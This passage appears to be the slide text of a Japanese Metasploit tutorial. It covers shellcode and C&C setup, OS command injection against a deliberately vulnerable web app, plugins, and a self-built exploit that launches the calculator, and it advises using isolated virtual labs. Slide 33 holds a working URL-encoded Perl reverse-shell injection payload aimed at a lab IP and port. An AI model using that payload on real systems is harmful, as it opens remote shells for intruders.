モジュールの指定
7.
シェルコードを設定
8.
オプションの確認
9.
ファイル名を設定
10.
IPアドレスを設定
11.
ポート番号を設定
12.
Exploitの作成
13.
C&Cサーバの用意
14.
オプションの確認
15.
シェルコードの設定
16.
オプションの確認
17.
IPアドレスを設定
18.
ポート番号を設定
19.
C&Cサーバの作成
20.
Let's exploit !
21.
Readme.txt
22.
攻撃が成功すると
23.
システム情報の取得
24.
lsコマンド
25.
Webアプリケーションの脆弱性を 突いてみる
26.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意
27.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意 後ろに任意のコマンドを挿入可能
28.
※実験の際の注意 必ず仮想環境を用いること 閉じたネットワーク内で実行する スナップショットを用いて被害前の状態へ戻せるように する
29.
ペイロードを選択
30.
IPアドレスの設定
31.
バックドアの生成
32.
C&Cサーバの用意
33.
Let's exploit !! http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20- e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI N-%3Efdopen%28$c,r%29;$~- %3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
34.
攻撃が成功すると
35.
Metasploit プラグイン
36.
プラグインを使用して機能を追加する
37.
便利なプラグイン Openvas MetasploitからOpenVASを利用するためのプラグイン Nessus MetasploitからNessusを利用するためのプラグイン Xssf MetasploitでXSSを行うためのプラグイン http://xssf.googlecode.com/svn/trunk auto_exploit データベースに登録された脆弱性に対してexploitする https://github.com/darkoperator/Metasploit-Plugins Postauto 確立しているセッションにコマンドを送信する https://github.com/darkoperator/Metasploit-Plugins
38.
Exploitを作って電卓を 起動してみる
39.
まずはExploitの用意 Exploit-dbから探す http://www.exploit-db.com/ 自作する
40.
今回は自作プログラムを用意
41.
大きなテキストファイルを読み込まると
42.
ROP自動化
43.
シェルコード選択
44.
変数の確認
45.
実行したいコマンドの設定
46.
pythonのコードを生成
47.
シェルコードをコピペしてから Let's exploit !!!
48.
電卓が起動!!
49.
ありがとうございました
Télécharger maintenant